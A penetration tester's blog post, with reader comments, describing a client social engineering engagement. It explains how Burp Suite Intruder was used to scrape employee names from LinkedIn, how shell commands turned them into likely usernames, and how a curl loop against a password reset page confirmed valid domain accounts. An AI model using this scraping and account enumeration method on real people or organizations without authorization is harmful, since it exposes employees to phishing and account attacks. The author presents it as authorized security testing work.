Social Engineering – Scraping Data from LinkedIn

Summary: A method and scripts to grab bulk data from LinkedIn profiles and format it using Burp Suite, curl, grep and cut, in this case to create a username list for identifying email addresses and domain accounts.

Foundation:
I was performing a fairly unusual task for a social engineering engagement for a client. Normally I’ll just receive a list of email accounts and/or phone numbers of the specific users the client wishes to test. In this case they didn’t want to provide ANY information at all; they wanted to see what I would be able to find and then have me target those users.

I started with the usual Google searches looking for pertinent data and found a little. I used metagoofil and theHarvester as well, which turned up about 20 valid accounts. During my googling I found a very interesting portal page that allowed users to reset their domain passwords. I wasn’t interested in brute forcing any accounts (yet), but I was able to use its functionality to test for valid accounts. I browsed to a webpage detailing some of the executives at the company and tried varying combinations of their names to find the format they used to create accounts. Not surprisingly, it turned out to be first initial plus last name.
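For a hypothetical executive named John Smith, the candidate formats to try against the portal look something like this (first initial plus last name, the first one, was the format that worked here):

jsmith
john.smith
johnsmith
j.smith
smithj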

I then turned my attention to LinkedIn and found over 1800 existing employees. If I could grab all of the employee names and format them, I could fire that list of usernames at the portal page and end up with a large list of valid user accounts. How best to do this?

Unfortunately, LinkedIn is one of the worst-designed websites for automating this. If I could change the number of results per page, this would be quick to do manually: at 100 results per page it would only be 18 pages to save and then grep the profile names out of. Unfortunately, LinkedIn hardcodes the website to 10 results per page (the LinkedIn API appears to allow 25, but the actual website is limited to 10). That would mean browsing to and saving 180 pages by hand, which is too much work, so automating it with a script that crawls each page and saves the output looked like the best option.

To do this I used the Intruder module of Burp Suite. I also needed a paid LinkedIn account; with a free one you would only see each person’s first name and last initial. I borrowed an account (legitimately) from a friend, logged into LinkedIn through Burp’s proxy, and let the proxy intercept feature capture the traffic. I then found the request for the search results page in the proxy history, right-clicked it and chose ‘Send to Intruder’.

On the Positions tab for Intruder you can see the HTTP request from the client. There are many variables in this GET request, so the first step is to remove all of them with the ‘Clear §’ button; this clears every position that Intruder would otherwise manipulate. Next, select the page_num variable and click the ‘Add §’ button.
Note that I changed the variable Keyword=ORG_NAME to protect the client; in reality it was just the organization’s name. The attack type doesn’t really matter for this test because we’re only manipulating a single variable; for the differences between the attack types, check out the PortSwigger website.
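To give a rough idea of what the marked-up request looks like, here is a sketch; the path and most parameter names are placeholders and will differ from the real LinkedIn request, but the point is that page_num is the only position wrapped in § markers:

GET /search/results?Keyword=ORG_NAME&page_num=§1§ HTTP/1.1
Host: www.linkedin.com
Cookie: [session cookies from the logged-in account]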

Now select the Payloads tab and choose Numbers as the payload type. This section is pretty self-explanatory: we want the payload to walk through every page number from 1 to 180, and the step defines how much it increments each time. Once you’re ready, click Intruder -> Start Attack.

Once the attack has completed you can highlight all of the requests, right-click and choose ‘Save selected items’. Choose a location and the contents of the responses will be saved in one file. This works perfectly for what we’re trying to do, as we can simply grep out the first and last names.

There were a few locations in the HTML file that contained the person’s first and last name. The one that seemed easiest to manipulate was part of a link that looked like this:
<a href="http://www.linkedin.com/people/invite?from=profile&key=2540332&firstName=Tyler&lastName=Wrightson&amp…

So to grab all the names I grepped the saved file for that pattern with the following command:

grep "people\/invite" burpsuite.txt | cut -d";" -f3,4 >> names.txt

Then I put them into a nicer format using search and replace in vi:
vi names.txt
:%s/firstName=//g
:%s/&lastName=/ /g
:%s/&amp//g
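If you prefer to do that cleanup non-interactively, the same substitutions can be made in one pass with sed; this is just a sketch mirroring the vi commands above (GNU sed, editing the file in place):

#same substitutions as the vi commands above, editing names.txt in place
sed -i 's/firstName=//g; s/&lastName=/ /g; s/&amp//g' names.txt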

I also noticed that some names contained plus signs and percent-encoded characters, URL encoding for extra information such as a nickname in quotes in their title. Because there were only a few, I went through and removed them manually to make sure they didn’t interfere with the last names.

Now we have a perfectly constructed list of first name and last name separated by a space.

#grab first initials with
cat names.txt | cut -c1 >> first_initial.txt
#grab last names with
cat names.txt | cut -d " " -f2 >> last_names.txt

Because both files contained the same number of items, I simply pasted each of them into an Excel spreadsheet, saved the spreadsheet as a CSV, and could then manipulate them as needed. In this case I simply did a search and replace on the comma, replacing it with nothing, and voila: 485 account names to test in a perfectly newline-delimited file.
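As an aside, the spreadsheet step can be skipped entirely; a one-line awk pass over names.txt builds the first-initial-plus-last-name accounts directly (the file name account_names.txt here is just my own label):

#build first-initial-plus-last-name account names straight from names.txt
awk '{print substr($1,1,1) $2}' names.txt > account_names.txt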

Next I created a Perl script that used each name in the file to construct a POST data file for curl, named USERNAME.post.
I then used curl to hit the password reset page with each of the usernames like so (the @ tells curl to read the POST body from the file):
curl --data @USERNAME.post https://client.com/reset_password.aspx >> USERNAME.response

*Note that this is also not the actual name of the client’s password reset page.

This took the data in the USERNAME.post file, sent the request to the password reset page, and saved the output as USERNAME.response. I could then grep all of the .response files for a string that indicated a valid account, and grep would give me the valid username as part of the matching file name. I did it this way partly because the username itself was not echoed back in the HTML of the page.
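The original Perl script isn’t included here, but a rough shell sketch of the same loop would look like the following; the form field names and the success string are placeholders for whatever the client’s reset page actually used:

#for each candidate username, build the POST body, send it, and save the response
while read username; do
  echo "txtUsername=${username}&btnReset=Reset" > "${username}.post"
  curl --data "@${username}.post" https://client.com/reset_password.aspx > "${username}.response"
done < account_names.txt

#the matching file names reveal which usernames were valid
grep -l "password reset email has been sent" *.response | sed 's/\.response$//' > valid_accounts.txt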

When this was all complete I had 110 valid domain usernames! Not bad for a start. I then wanted to remove those confirmed names from the larger list so that I could target the known-valid accounts differently from the merely possible account names. I did this with the following command:

#remove the entries that appear in both files (comm expects both files to be sorted)
comm -3 full_list.txt valid_accounts.txt >> possible_names.txt

4 comments

  1. Thanks for the share Tyler, handy read.

  2. Hi Tyler, thanks for sharing.
    I’m trying to get bulk company data from LinkedIn, like the number of employees.
    Do you have any idea how I should go to get it done?

    1. twrightson:

      You can pretty much follow the example here. I know the LinkedIn page structure has changed a little bit as I had to do this recently and the variables were a little different but the concept is exactly the same. Feel free to email me or hit me up on twitter if you get stuck.
